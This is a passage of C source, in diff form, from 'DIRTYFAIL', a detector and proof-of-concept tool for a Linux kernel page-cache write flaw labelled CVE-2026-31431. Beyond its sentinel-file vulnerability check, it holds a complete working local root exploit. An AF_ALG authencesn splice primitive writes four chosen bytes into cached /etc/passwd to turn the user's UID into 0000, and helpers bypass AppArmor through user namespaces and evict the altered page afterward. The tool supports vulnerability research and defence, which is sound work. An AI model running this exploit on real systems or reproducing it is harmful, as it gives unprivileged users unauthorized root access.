/* Flush — when stdout is piped (e.g. through ssh, timeout, tee)
* the default fully-buffered mode hides log lines until either the
* process exits cleanly or 4 KiB accumulates. We log to follow
* progress; visibility wins over throughput here. */
fflush(out);
}
/* In --json mode, all log output goes to stderr so stdout stays a
* clean JSON document for downstream parsers. Outside --json mode,
* we keep the original split (info/progress to stdout, errors to
* stderr) for human readability. */
#define LOG_FN(name, prefix, color, default_stream) \
void name(const char *fmt, ...) { \
FILE *_s = dirtyfail_json ? stderr : (default_stream); \
va_list ap; va_start(ap, fmt); \
vlog(_s, prefix, color, fmt, ap); \
va_end(ap); \
}
LOG_FN(log_step, "[*]", "1;36", stdout) /* cyan */
LOG_FN(log_ok, "[+]", "1;32", stdout) /* green */
LOG_FN(log_bad, "[-]", "1;31", stderr) /* red */
LOG_FN(log_warn, "[!]", "1;33", stderr) /* yellow*/
LOG_FN(log_hint, "[i]", "0;37", stdout) /* dim */
/* ------------------------------------------------------------------ */
bool kernel_version(int *major, int *minor)
{
struct utsname u;
if (uname(&u) != 0) return false;
/* release looks like "6.12.0-124.49.1.el10_1.x86_64" — split on dots. */
char *dot1 = strchr(u.release, '.');
if (!dot1) return false;
*dot1 = '\0';
*major = atoi(u.release);
char *dot2 = strchr(dot1 + 1, '.');
if (dot2) *dot2 = '\0';
*minor = atoi(dot1 + 1);
return true;
}
bool kmod_loaded(const char *name)
{
FILE *f = fopen("/proc/modules", "r");
if (!f) return false;
char line[512];
size_t nlen = strlen(name);
bool found = false;
while (fgets(line, sizeof(line), f)) {
if (strncmp(line, name, nlen) == 0 && line[nlen] == ' ') {
found = true;
break;
}
}
fclose(f);
return found;
}
/* Probe by spawning a child. Doing it inline would either succeed (and
* leave us in a fresh userns for the rest of the run, breaking later
* checks) or fail and leave errno polluted. The fork is cheap enough.
*
* We use syscall(SYS_unshare) rather than the libc wrapper so this
* compiles on toolchains where <sched.h> doesn't expose unshare(). */
bool unprivileged_userns_allowed(void)
{
#ifdef __linux__
pid_t pid = fork();
if (pid < 0) return false;
if (pid == 0) {
if (syscall(SYS_unshare, CLONE_NEWUSER) == 0) _exit(0);
_exit(1);
}
int wstatus = 0;
waitpid(pid, &wstatus, 0);
return WIFEXITED(wstatus) && WEXITSTATUS(wstatus) == 0;
#else
return false; /* macOS analysis path — never executed in production */
#endif
}
bool find_passwd_uid_field(const char *username,
off_t *uid_off, size_t *uid_len,
char *uid_str)
{
int fd = open("/etc/passwd", O_RDONLY);
if (fd < 0) return false;
struct stat st;
if (fstat(fd, &st) < 0) { close(fd); return false; }
char *buf = malloc(st.st_size + 1);
if (!buf) { close(fd); return false; }
ssize_t got = read(fd, buf, st.st_size);
close(fd);
if (got <= 0) { free(buf); return false; }
buf[got] = '\0';
bool found = false;
size_t ulen = strlen(username);
char *line = buf;
while (line < buf + got) {
if (strncmp(line, username, ulen) == 0 && line[ulen] == ':') {
/* user:x:UID:GID:... — skip 2 colons to land on UID start. */
char *p = line + ulen + 1;
char *colon = strchr(p, ':');
if (!colon) break;
char *uid_start = colon + 1;
char *uid_end = strchr(uid_start, ':');
if (!uid_end) break;
size_t len = uid_end - uid_start;
if (len >= 16) break;
*uid_off = uid_start - buf;
*uid_len = len;
memcpy(uid_str, uid_start, len);
uid_str[len] = '\0';
found = true;
break;
}
char *nl = strchr(line, '\n');
if (!nl) break;
line = nl + 1;
}
free(buf);
return found;
}
bool drop_caches(void)
{
int fd = open("/proc/sys/vm/drop_caches", O_WRONLY);
if (fd < 0) return false;
ssize_t n = write(fd, "3\n", 2);
close(fd);
return n == 2;
}
void hex_dump(const unsigned char *buf, size_t len)
{
for (size_t i = 0; i < len; i += 16) {
printf(" %04zx ", i);
for (size_t j = 0; j < 16; j++) {
if (i + j < len) printf("%02x ", buf[i + j]);
else printf(" ");
}
printf(" |");
for (size_t j = 0; j < 16 && i + j < len; j++) {
unsigned char c = buf[i + j];
putchar(isprint(c) ? c : '.');
}
printf("|\n");
}
}
/*
* authenc keyblob layout (see crypto/authenc.c::crypto_authenc_setkey):
*
* struct rtattr { __u16 rta_len; __u16 rta_type; } = 4 bytes
* __be32 enckeylen = 4 bytes
* authkey[authkeylen]
* enckey [enckeylen]
*
* rta_len in the rtattr counts the rtattr header *plus* the enckeylen
* field, so it is always 8.
*/
size_t build_authenc_keyblob(unsigned char *out,
const unsigned char *authkey, size_t authkeylen,
const unsigned char *enckey, size_t enckeylen)
{
/* struct rtattr { u16 rta_len; u16 rta_type; } */
out[0] = 8; out[1] = 0;
out[2] = CRYPTO_AUTHENC_KEYA_PARAM;
out[3] = 0;
/* __be32 enckeylen */
out[4] = (enckeylen >> 24) & 0xff;
out[5] = (enckeylen >> 16) & 0xff;
out[6] = (enckeylen >> 8) & 0xff;
out[7] = (enckeylen ) & 0xff;
memcpy(out + 8, authkey, authkeylen);
memcpy(out + 8 + authkeylen, enckey, enckeylen);
return 8 + authkeylen + enckeylen;
}
bool typed_confirm(const char *expected)
{
char buf[128];
printf(" Type \033[1;33m%s\033[0m and press enter to proceed: ", expected);
fflush(stdout);
if (!fgets(buf, sizeof(buf), stdin)) return false;
/* strip trailing newline */
size_t n = strlen(buf);
while (n > 0 && (buf[n-1] == '\n' || buf[n-1] == '\r')) buf[--n] = '\0';
return strcmp(buf, expected) == 0;
}
static uid_t read_outer_id(const char *path)
{
int fd = open(path, O_RDONLY);
if (fd < 0) return (uid_t)-1;
char buf[256];
ssize_t n = read(fd, buf, sizeof(buf) - 1);
close(fd);
if (n <= 0) return (uid_t)-1;
buf[n] = '\0';
/* Format: "<inner> <outer> <count>". For init namespace, this is
* "0 0 4294967295" — outer == 0 == real root. For our userns it's
* "0 1000 1" — outer == 1000 == real uid. */
int inner = -1, outer = -1, count = 0;
if (sscanf(buf, "%d %d %d", &inner, &outer, &count) != 3 || inner != 0)
return (uid_t)-1;
return (uid_t)outer;
}
uid_t real_uid_for_target(void)
{
uid_t outer = read_outer_id("/proc/self/uid_map");
/* If we're root in the init namespace OR no userns — return getuid().
* The init namespace map shows "0 0 4294967295" → outer=0; only
* trust an outer != 0 (and != -1) as the bypass-userns case. */
if (outer == (uid_t)-1) return getuid();
if (outer == 0) return getuid();
return outer;
}
gid_t real_gid_for_target(void)
{
uid_t outer = read_outer_id("/proc/self/gid_map");
if (outer == (uid_t)-1) return getgid();
if (outer == 0) return getgid();
return (gid_t)outer;
}
/* Best-effort eviction of /etc/passwd from the page cache. Used by
* the --no-shell path to revert the page-cache modification after a
* successful exploit + verify.
*
* The naive `posix_fadvise(POSIX_FADV_DONTNEED)` is unreliable here:
* since Linux 6.3, fadvise requires write access to the file, and we
* typically don't have write access to /etc/passwd from inside the
* AA bypass userns (root in userns maps to overflow uid in init ns,
* which doesn't own the file).
*
* So we try in order:
* 1. posix_fadvise on a fresh O_RDONLY fd (best case)
* 2. sudo drop_caches via the system shell — works if the user has
* passwordless sudo, which is common on test VMs but a
* reasonable assumption to fail closed on
*
* Returns true if the cache was definitely cleared, false otherwise.
* Caller should treat false as "page cache may still be modified —
* tell the user to reboot if their session breaks". */
bool try_revert_passwd_page_cache(void)
{
bool ok = false;
#ifdef POSIX_FADV_DONTNEED
int fd = open("/etc/passwd", O_RDONLY);
if (fd >= 0) {
if (posix_fadvise(fd, 0, 0, POSIX_FADV_DONTNEED) == 0) ok = true;
close(fd);
}
#endif
/* Even if fadvise returned 0, modern kernels silently no-op when
* we lack write access — verify by re-reading and comparing to
* what's on disk via O_DIRECT. Too fiddly. Just always also try
* drop_caches as belt+suspenders. */
int rc = system("sudo -n /bin/sh -c 'echo 3 > /proc/sys/vm/drop_caches' "
">/dev/null 2>&1");
if (rc == 0) ok = true;
return ok;
}
bool ssh_lockout_check(const char *target_user)
{
const char *ssh_conn = getenv("SSH_CONNECTION");
if (!ssh_conn || !*ssh_conn) return true; /* not over SSH */
const char *user = getenv("USER");
if (!user) {
struct passwd *pw = getpwuid(real_uid_for_target());
user = pw ? pw->pw_name : "";
}
if (strcmp(user, target_user) != 0) return true; /* different user */
log_warn("=================================================================");
log_warn(" SSH LOCKOUT WARNING");
log_warn("=================================================================");
log_warn(" You are running this exploit OVER SSH against your OWN account.");
log_warn(" The page-cache write will mark '%s' as uid 0 in /etc/passwd.",
target_user);
log_warn(" Once that lands:");
log_warn(" - sshd looks up '%s', sees uid 0", target_user);
log_warn(" - StrictModes rejects ~/.ssh/authorized_keys (owner uid 1000");
log_warn(" != logging-in uid 0) → publickey auth fails");
log_warn(" - PAM password auth also fails (uid mismatch)");
log_warn(" Recovery requires console access to drop_caches or reboot.");
log_warn(" If this is what you want, type YES_BREAK_SSH below.");
log_warn(" Otherwise consider --exploit-backdoor (targets a nologin line");
log_warn(" instead of your account, doesn't break SSH).");
log_warn("=================================================================");
return typed_confirm("YES_BREAK_SSH");
}
int open_and_cache(const char *path)
{
int fd = open(path, O_RDONLY);
if (fd < 0) return -1;
/* Force a read so the page is in the cache. The exploit primitives
* all assume the target page is already populated. We don't care
* what the bytes are or whether read returns short — only that the
* kernel pulled the page into the cache as a side effect. */
char tmp[4096];
if (read(fd, tmp, sizeof(tmp)) < 0) {
/* primer failed; caller's splice will surface a useful errno. */
}
lseek(fd, 0, SEEK_SET);
return fd;
}
+197
View File
@@ -0,0 +1,197 @@
/*
* DIRTYFAIL — common.h
*
* Shared declarations for the DIRTYFAIL detector + PoC binary.
*
* This file is intentionally light: AF_ALG / SOL_ALG constants that older
* libcs do not export, log macros that respect --no-color, and the
* type definitions used by every CVE module.
*/
#ifndef DIRTYFAIL_COMMON_H
#define DIRTYFAIL_COMMON_H
/* The Makefile passes -D_GNU_SOURCE on the command line; this guard
* keeps gcc from warning about a duplicate definition when callers
* include common.h after the cmdline -D has already taken effect. */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>
/* ------------------------------------------------------------------ *
* AF_ALG constants
*
* These are upstream in <linux/if_alg.h>, but plenty of distros ship
* stale headers. Declare locally so DIRTYFAIL builds on every target
* we have run it against (Ubuntu 22.04 → 24.04, RHEL 9/10, Fedora 42+).
* ------------------------------------------------------------------ */
#ifndef AF_ALG
#define AF_ALG 38
#endif
#ifndef SOL_ALG
#define SOL_ALG 279
#endif
#define ALG_SET_KEY 1
#define ALG_SET_IV 2
#define ALG_SET_OP 3
#define ALG_SET_AEAD_ASSOCLEN 4
#define ALG_SET_AEAD_AUTHSIZE 5
#define ALG_OP_DECRYPT 0
#define ALG_OP_ENCRYPT 1
#define CRYPTO_AUTHENC_KEYA_PARAM 1 /* rtattr type, <crypto/authenc.h> */
struct sockaddr_alg_compat {
unsigned short salg_family;
unsigned char salg_type[14];
unsigned int salg_feat;
unsigned int salg_mask;
unsigned char salg_name[64];
};
/* ------------------------------------------------------------------ *
* Logging
*
* DIRTYFAIL output is meant to be skim-readable by a researcher *and*
* grep-friendly in CI. We use a small set of fixed prefixes so that
* automation can match on lines without parsing color escapes:
*
* [*] step / status [+] good news / detection result
* [-] bad news [!] attention / VULNERABLE
* [i] hint [?] prompt
* ------------------------------------------------------------------ */
extern bool dirtyfail_use_color;
/* When true, --scan and --check-* modes do an active sentinel-file STORE
* probe per mode in addition to precondition checks. Set by --active. */
extern bool dirtyfail_active_probes;
/* When true, --no-shell mode skips the auto-revert step — the page-cache
* plant survives until --cleanup or drop_caches. Used by the
* container-escape demo to show that the corruption crosses namespace
* boundaries. Set by --no-revert. */
extern bool dirtyfail_no_revert;
/* When true, --scan emits a single JSON object on stdout (suitable for
* SIEM/fleet ingestion); all log output (banner, step/ok/bad/warn/hint)
* is redirected to stderr. Set by --json. */
extern bool dirtyfail_json;
void log_step (const char *fmt, ...) __attribute__((format(printf, 1, 2)));
void log_ok (const char *fmt, ...) __attribute__((format(printf, 1, 2)));
void log_bad (const char *fmt, ...) __attribute__((format(printf, 1, 2)));
void log_warn (const char *fmt, ...) __attribute__((format(printf, 1, 2)));
void log_hint (const char *fmt, ...) __attribute__((format(printf, 1, 2)));
/* ------------------------------------------------------------------ *
* Result codes returned by every detector / exploiter.
*
* They map onto exit codes used by the top-level binary so that CI
* pipelines can branch on them without parsing stdout:
*
* DF_OK exit 0 not vulnerable
* DF_VULNERABLE exit 2 vulnerable (detector confirmed primitive)
* DF_PRECOND_FAIL exit 0 prerequisites missing → not vulnerable here
* DF_TEST_ERROR exit 1 could not determine
* DF_EXPLOIT_OK exit 0 exploit succeeded (root achieved)
* DF_EXPLOIT_FAIL exit 3 exploit attempted but did not land
*
* Detectors should never return DF_EXPLOIT_*; exploiters should never
* return DF_PRECOND_FAIL (they assume the detector ran first).
* ------------------------------------------------------------------ */
typedef enum {
DF_OK = 0,
DF_VULNERABLE = 2,
DF_PRECOND_FAIL = 4,
DF_TEST_ERROR = 1,
DF_EXPLOIT_OK = 5,
DF_EXPLOIT_FAIL = 3,
} df_result_t;
/* ------------------------------------------------------------------ *
* Utilities (common.c)
* ------------------------------------------------------------------ */
/* Parse uname(2)->release into (major, minor). Returns false on parse error. */
bool kernel_version(int *major, int *minor);
/* Read /proc/modules and return true if `name` is loaded. Returns false
* (and sets errno) if /proc/modules cannot be opened. */
bool kmod_loaded(const char *name);
/* Best-effort: can the calling user create a user namespace?
* forks a child that calls unshare(CLONE_NEWUSER) and reports back. */
bool unprivileged_userns_allowed(void);
/* Find current user's UID/GID field offsets in /etc/passwd.
* uid_off, uid_len: byte offset and string length of UID field
* uid_str: caller-supplied buffer >= 16 bytes; receives current UID
* Returns false if user not found or UID isn't a 4-digit number. */
bool find_passwd_uid_field(const char *username,
off_t *uid_off, size_t *uid_len,
char *uid_str);
/* Drop the kernel page cache. Requires root. */
bool drop_caches(void);
/* Best-effort eviction of /etc/passwd from page cache. Tries
* POSIX_FADV_DONTNEED, then `sudo drop_caches` as belt-and-suspenders.
* Returns true if at least one path succeeded. See common.c for
* caveats. */
bool try_revert_passwd_page_cache(void);
/* Print a hex+ASCII dump (max `len` bytes). For debug output. */
void hex_dump(const unsigned char *buf, size_t len);
/* Build the rtattr-prefixed authenc keyblob expected by ALG_SET_KEY for
* authencesn(hmac(sha256), cbc(aes)). `out` must be >= 8+authkeylen+enckeylen.
* Returns total bytes written. */
size_t build_authenc_keyblob(unsigned char *out,
const unsigned char *authkey, size_t authkeylen,
const unsigned char *enckey, size_t enckeylen);
/* Prompt the user to type the literal string `expected` and press enter.
* Returns true only on exact match. Used as a last-line gate before
* --exploit modifies real system state. */
bool typed_confirm(const char *expected);
/* Convenience: open `path` RO and return a freshly-cached fd.
* The page-cache primitives below all assume the page is hot. */
int open_and_cache(const char *path);
/* Return the user's real (outer) uid, defeating the userns illusion.
*
* After the AppArmor bypass enters us into a fresh user namespace with
* uid_map "0 <real_uid> 1", `getuid()` returns 0 inside the namespace —
* which lies to exploit code that wants to know which user account to
* target in /etc/passwd. This helper reads /proc/self/uid_map; if it
* shows a non-identity mapping like "0 1000 1", returns the outer uid
* (1000). Otherwise (init namespace, or no userns at all) returns
* `getuid()`.
*
* Same idea for real_gid_for_target. */
uid_t real_uid_for_target(void);
gid_t real_gid_for_target(void);
/* If $SSH_CONNECTION is set AND `target_user` is the SSH login user,
* the user-uid-flip exploits about to fire will lock the operator out
* of SSH (sshd reads modified /etc/passwd, sees uid 0, then StrictModes
* rejects ~/.ssh/authorized_keys because file owner != logging-in uid).
* The lockout persists until the page cache is evicted — typically only
* a reboot recovers, since drop_caches needs root.
*
* Emit a loud warning and require an extra typed_confirm("YES_BREAK_SSH").
* Returns true to proceed, false to abort. Always returns true when not
* over SSH or when the target user differs from $USER. */
bool ssh_lockout_check(const char *target_user);
#endif /* DIRTYFAIL_COMMON_H */
+451
View File
@@ -0,0 +1,451 @@
/*
* DIRTYFAIL — copyfail.c — CVE-2026-31431 ("Copy Fail")
*
* Detector + opt-in PoC.
*
* BACKGROUND
* ----------
* The Linux kernel's authencesn(hmac(sha256), cbc(aes)) AEAD template
* performs a 4-byte "scratch" copy at the end of its destination
* scatterlist as part of moving the ESN sequence-number high bits
* around. The crypto code assumes src and dst point at kernel-private
* memory. They do — except when the AF_ALG socket family is used:
* algif_aead lets userspace splice() pages into the request, and the
* AEAD primitive runs in-place. By splicing a page-cache page from a
* readable file into the request, the scratch write lands in that page
* cache. The on-disk file is untouched, but the kernel (and every
* subsequent reader) sees the modified copy until the page is evicted.
*
* The 4 bytes that get written are bytes 4..7 of the AAD ("seqno_lo"
* in the ESP header layout), which userspace controls directly. Net
* result: an unprivileged 4-byte arbitrary-offset write into any
* world-readable file's page cache.
*
* DETECTION STRATEGY
* ------------------
* We never touch system files in detection. Instead we:
* 1. Confirm AF_ALG + authencesn(...) can be instantiated.
* 2. Create a sentinel file in $TMPDIR and fault its first page in.
* 3. Run the exact primitive against the sentinel file with a
* recognizable marker ("PWND") in seqno_lo.
* 4. Re-read the sentinel and look for the marker bytes.
*
* If the marker shows up: the kernel just wrote attacker-controlled
* bytes into a page-cache page over an unmodified disk file. That is
* the entire vulnerability. Vulnerable.
*
* EXPLOIT STRATEGY
* ----------------
* /etc/passwd is world-readable and contains a 4-digit UID for normal
* users (1000-9999). Flipping that UID to "0000" in the page cache
* makes glibc's getpwnam() report uid=0 for our user. PAM (which still
* checks /etc/shadow on disk, untouched) accepts the real password,
* and then setuid(0) lands us at root. Single 4-byte write, fully
* reversible with POSIX_FADV_DONTNEED.
*/
#include "copyfail.h"
#include <fcntl.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <pwd.h>
/* These macros come from <sys/socket.h> on Linux but vary across libcs. */
#ifndef MSG_MORE
#define MSG_MORE 0x8000
#endif
#ifdef __linux__
extern ssize_t splice(int, loff_t *, int, loff_t *, size_t, unsigned int);
#else
/* macOS analysis stub — never called at runtime. */
static ssize_t splice(int a, void *b, int c, void *d, size_t e, unsigned f)
{ (void)a; (void)b; (void)c; (void)d; (void)e; (void)f; errno = ENOSYS; return -1; }
#endif
#define PAGE 4096
#define ASSOCLEN 8 /* SPI(4) || seqno_lo(4) */
#define CRYPTLEN 16 /* one AES block */
#define TAGLEN 16 /* truncated HMAC-SHA256 */
#define SPLICE_LEN (CRYPTLEN + TAGLEN)
#define ALG_NAME "authencesn(hmac(sha256),cbc(aes))"
#define MARKER_STR "PWND"
/* ---------------------------------------------------------------- *
* af_alg_setup_socket()
*
* Creates the master AF_ALG socket, binds it to authencesn, sets a
* zero key (auth+enc), and accept(2)s an op socket. Returns the op fd
* (or -1 with errno set). On success the master fd is closed before
* return — we only need the op socket for the actual transaction.
* ---------------------------------------------------------------- */
static int af_alg_setup_socket(void)
{
int master = socket(AF_ALG, SOCK_SEQPACKET, 0);
if (master < 0) return -1;
struct sockaddr_alg_compat sa = { .salg_family = AF_ALG };
strncpy((char *)sa.salg_type, "aead", sizeof(sa.salg_type) - 1);
strncpy((char *)sa.salg_name, ALG_NAME, sizeof(sa.salg_name) - 1);
if (bind(master, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
close(master);
return -1;
}
/* Auth key (HMAC-SHA256) is 32 bytes; cipher key (AES-128) is 16.
* We pick zero for both — auth verification will fail at the end
* (EBADMSG), but the buggy scratch-write fires *before* that, so
* the page-cache modification persists either way. */
unsigned char auth[32] = {0}, enc[16] = {0};
unsigned char keyblob[8 + 32 + 16];
size_t keylen = build_authenc_keyblob(keyblob, auth, 32, enc, 16);
if (setsockopt(master, SOL_ALG, ALG_SET_KEY, keyblob, keylen) < 0) {
close(master);
return -1;
}
int op = accept(master, NULL, NULL);
int saved = errno;
close(master);
errno = saved;
return op;
}
/* ---------------------------------------------------------------- *
* af_alg_send_aad()
*
* Sends per-op control messages (decrypt, IV, assoclen=8) plus the
* AAD itself with MSG_MORE. AAD layout:
*
* bytes 0..3 SPI (we leave zero — the kernel doesn't care)
* bytes 4..7 seqno_lo (this is the 4 bytes that get STOREd)
*
* Returns true on success.
* ---------------------------------------------------------------- */
static bool af_alg_send_aad(int op, const unsigned char four_bytes[4])
{
unsigned char aad[ASSOCLEN] = { 0 };
memcpy(aad + 4, four_bytes, 4);
unsigned int op_decrypt = ALG_OP_DECRYPT;
unsigned int assoclen = ASSOCLEN;
unsigned char iv[20]; /* u32 ivlen + 16-byte IV */
*(uint32_t *)iv = 16;
memset(iv + 4, 0, 16);
/* CMSG_SPACE values for: ALG_SET_OP(u32), ALG_SET_IV(u32+16), ALG_SET_ASSOCLEN(u32). */
union {
char buf[CMSG_SPACE(sizeof(unsigned int))
+ CMSG_SPACE(20)
+ CMSG_SPACE(sizeof(unsigned int))];
struct cmsghdr align;
} ctrl;
memset(&ctrl, 0, sizeof(ctrl));
struct iovec iov = { .iov_base = aad, .iov_len = ASSOCLEN };
struct msghdr msg = {
.msg_iov = &iov,
.msg_iovlen = 1,
.msg_control = ctrl.buf,
.msg_controllen = sizeof(ctrl.buf),
};
struct cmsghdr *cm = CMSG_FIRSTHDR(&msg);
cm->cmsg_len = CMSG_LEN(sizeof(unsigned int));
cm->cmsg_level = SOL_ALG;
cm->cmsg_type = ALG_SET_OP;
memcpy(CMSG_DATA(cm), &op_decrypt, sizeof(op_decrypt));
cm = CMSG_NXTHDR(&msg, cm);
cm->cmsg_len = CMSG_LEN(20);
cm->cmsg_level = SOL_ALG;
cm->cmsg_type = ALG_SET_IV;
memcpy(CMSG_DATA(cm), iv, 20);
cm = CMSG_NXTHDR(&msg, cm);
cm->cmsg_len = CMSG_LEN(sizeof(unsigned int));
cm->cmsg_level = SOL_ALG;
cm->cmsg_type = ALG_SET_AEAD_ASSOCLEN;
memcpy(CMSG_DATA(cm), &assoclen, sizeof(assoclen));
return sendmsg(op, &msg, MSG_MORE) >= 0;
}
/* ---------------------------------------------------------------- *
* cf_4byte_write()
*
* The whole primitive in one function: open the target, force its
* page into the cache, set up an AF_ALG op socket, send AAD with our
* controlled 4 bytes, splice 32 bytes from the target file into the
* op socket (the kernel uses those page-cache pages as the *destination*
* of the in-place AEAD), then drive the op via recv() so that the
* scratch-write fires.
*
* `four_bytes` lands at file offset `target_off` of the cached page.
* Returns true on success (with errno cleared) — but "success" here
* just means "the syscalls completed". Whether the write actually
* landed must be confirmed by the caller via a read-back.
* ---------------------------------------------------------------- */
bool cf_4byte_write(const char *target_path,
off_t target_off,
const unsigned char four_bytes[4])
{
int target_fd = open_and_cache(target_path);
if (target_fd < 0) {
log_bad("open %s: %s", target_path, strerror(errno));
return false;
}
int op = af_alg_setup_socket();
if (op < 0) {
log_bad("AF_ALG setup: %s", strerror(errno));
close(target_fd);
return false;
}
if (!af_alg_send_aad(op, four_bytes)) {
log_bad("sendmsg AAD: %s", strerror(errno));
close(op); close(target_fd);
return false;
}
int pipefd[2];
if (pipe(pipefd) < 0) {
log_bad("pipe: %s", strerror(errno));
close(op); close(target_fd);
return false;
}
/* file -> pipe: 32 bytes from offset target_off (CRYPTLEN+TAGLEN). */
off_t off = target_off;
ssize_t n1 = splice(target_fd, &off, pipefd[1], NULL, SPLICE_LEN, 0);
if (n1 != SPLICE_LEN) {
log_bad("splice file->pipe: got %zd want %d (%s)",
n1, SPLICE_LEN, strerror(errno));
close(pipefd[0]); close(pipefd[1]); close(op); close(target_fd);
return false;
}
/* pipe -> op socket: kernel now has page-cache pages in dst SGL. */
ssize_t n2 = splice(pipefd[0], NULL, op, NULL, SPLICE_LEN, 0);
close(pipefd[0]); close(pipefd[1]);
if (n2 != SPLICE_LEN) {
log_bad("splice pipe->op: got %zd want %d (%s)",
n2, SPLICE_LEN, strerror(errno));
close(op); close(target_fd);
return false;
}
/* Drive the AEAD. recv will fail with EBADMSG (auth check fails on
* our zero key + zero ciphertext); the scratch write has already
* happened by then. */
unsigned char drain[256];
ssize_t r = recv(op, drain, sizeof(drain), 0);
int saved = errno;
(void)r;
close(op);
close(target_fd);
errno = (saved == EBADMSG || saved == EINVAL || r >= 0) ? 0 : saved;
return errno == 0;
}
/* ---------------------------------------------------------------- *
* Detection
* ---------------------------------------------------------------- */
df_result_t copyfail_detect(void)
{
log_step("Copy Fail (CVE-2026-31431) — detection");
int km = -1, kn = -1;
if (kernel_version(&km, &kn))
log_hint("kernel %d.%d.x (affected lines: 6.12, 6.17, 6.18)", km, kn);
/* Probe AF_ALG availability and instantiation of authencesn. */
int probe = socket(AF_ALG, SOCK_SEQPACKET, 0);
if (probe < 0) {
log_ok("AF_ALG socket family unavailable (%s) — NOT vulnerable",
strerror(errno));
return DF_PRECOND_FAIL;
}
struct sockaddr_alg_compat sa = { .salg_family = AF_ALG };
strncpy((char *)sa.salg_type, "aead", sizeof(sa.salg_type) - 1);
strncpy((char *)sa.salg_name, ALG_NAME, sizeof(sa.salg_name) - 1);
if (bind(probe, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
log_ok("authencesn template not loadable (%s) — NOT vulnerable",
strerror(errno));
close(probe);
return DF_PRECOND_FAIL;
}
close(probe);
log_ok("AF_ALG + %s loadable", ALG_NAME);
/* Sentinel file probe. */
char tmpl[] = "/tmp/copyfail-sentinel.XXXXXX";
int sfd = mkstemp(tmpl);
if (sfd < 0) {
log_bad("mkstemp: %s", strerror(errno));
return DF_TEST_ERROR;
}
unsigned char sentinel[PAGE];
for (size_t i = 0; i < PAGE; i += 32)
memcpy(sentinel + i, "COPYFAIL-SENTINEL-UNCORRUPTED!!\n", 32);
if (write(sfd, sentinel, PAGE) != PAGE) {
log_bad("sentinel write: %s", strerror(errno));
close(sfd); unlink(tmpl);
return DF_TEST_ERROR;
}
close(sfd);
log_step("triggering primitive against %s with marker '%s'",
tmpl, MARKER_STR);
if (!cf_4byte_write(tmpl, 0, (const unsigned char *)MARKER_STR)) {
unlink(tmpl);
return DF_TEST_ERROR;
}
/* Re-read the sentinel via a fresh fd (page cache, not disk). */
int rfd = open(tmpl, O_RDONLY);
if (rfd < 0) { unlink(tmpl); return DF_TEST_ERROR; }
unsigned char after[PAGE];
ssize_t got = read(rfd, after, PAGE);
close(rfd);
unlink(tmpl);
if (got != PAGE) return DF_TEST_ERROR;
/* Look for the marker. We expect it to land somewhere inside the
* 32-byte spliced region (offsets 0..31). */
unsigned char *hit = memmem(after, 32, MARKER_STR, 4);
bool orig_has_marker = memmem(sentinel, 32, MARKER_STR, 4) != NULL;
if (hit && !orig_has_marker) {
size_t off = hit - after;
log_warn("VULNERABLE — marker '%s' landed at sentinel offset %zu",
MARKER_STR, off);
log_warn("apply the upstream fix (commit a664bf3d or distro backport)");
log_warn("interim mitigation: blacklist the algif_aead module");
return DF_VULNERABLE;
}
/* Sometimes the layout puts the scratch write outside the first
* 32 bytes; check the whole page for ANY divergence. */
size_t diff_count = 0, first_diff = (size_t)-1;
for (size_t i = 0; i < PAGE; i++) {
if (after[i] != sentinel[i]) {
if (first_diff == (size_t)-1) first_diff = i;
diff_count++;
}
}
if (diff_count > 0) {
log_warn("page cache MODIFIED (%zu bytes changed, first at offset %zu)",
diff_count, first_diff);
log_warn("the marker layout differs but the underlying bug class "
"still allowed a page-cache page into the AEAD dst SGL");
return DF_VULNERABLE;
}
log_ok("page cache intact — NOT vulnerable on this kernel");
return DF_OK;
}
/* ---------------------------------------------------------------- *
* Exploit
* ---------------------------------------------------------------- */
df_result_t copyfail_exploit(bool do_shell)
{
log_step("Copy Fail (CVE-2026-31431) — exploit");
/* Resolve the calling user. We deliberately do not exploit as
* root or for arbitrary users — only the user who ran us. */
uid_t uid = getuid();
if (uid == 0) {
log_warn("already root — nothing to escalate");
return DF_OK;
}
struct passwd *pw = getpwuid(uid);
if (!pw) {
log_bad("getpwuid(%u): %s", uid, strerror(errno));
return DF_TEST_ERROR;
}
const char *user = pw->pw_name;
log_step("target user: %s (uid %u)", user, uid);
off_t uid_off = 0;
size_t uid_len = 0;
char uid_str[16];
if (!find_passwd_uid_field(user, &uid_off, &uid_len, uid_str)) {
log_bad("could not find %s in /etc/passwd", user);
return DF_TEST_ERROR;
}
log_step("/etc/passwd: UID field at offset %lld = '%s' (%zu chars)",
(long long)uid_off, uid_str, uid_len);
if (uid_len != 4) {
log_bad("this technique needs a 4-digit UID; got '%s' (%zu chars)",
uid_str, uid_len);
log_hint("either pick a different user with a 4-digit UID, or use "
"the multi-shot variant (not implemented in DIRTYFAIL).");
return DF_TEST_ERROR;
}
log_warn("about to flip /etc/passwd page cache: '%s' -> '0000'", uid_str);
log_warn("on-disk file is unchanged. cleanup options:");
log_warn(" 1) DIRTYFAIL --cleanup (POSIX_FADV_DONTNEED + drop_caches)");
log_warn(" 2) echo 3 > /proc/sys/vm/drop_caches (from root)");
log_warn(" 3) reboot");
if (!typed_confirm("DIRTYFAIL")) {
log_bad("confirmation declined — aborting");
return DF_OK;
}
if (!ssh_lockout_check(user)) {
log_bad("SSH-lockout confirmation declined — aborting");
return DF_OK;
}
log_step("issuing 4-byte page-cache write...");
if (!cf_4byte_write("/etc/passwd", uid_off,
(const unsigned char *)"0000")) {
log_bad("primitive failed");
return DF_EXPLOIT_FAIL;
}
/* Verify via a fresh read against the page cache. */
int v = open("/etc/passwd", O_RDONLY);
if (v < 0) { log_bad("verify open: %s", strerror(errno)); return DF_EXPLOIT_FAIL; }
if (lseek(v, uid_off, SEEK_SET) != uid_off) { close(v); return DF_EXPLOIT_FAIL; }
char land[5] = {0};
if (read(v, land, 4) != 4) { close(v); return DF_EXPLOIT_FAIL; }
close(v);
if (memcmp(land, "0000", 4) != 0) {
log_bad("write did not land — page cache reads '%.4s'", land);
return DF_EXPLOIT_FAIL;
}
log_ok("page cache now reports %s with uid 0", user);
/* Sanity check via libc — getpwnam() walks NSS, which on most
* systems hits files first, so this should agree with our patch. */
struct passwd *p = getpwnam(user);
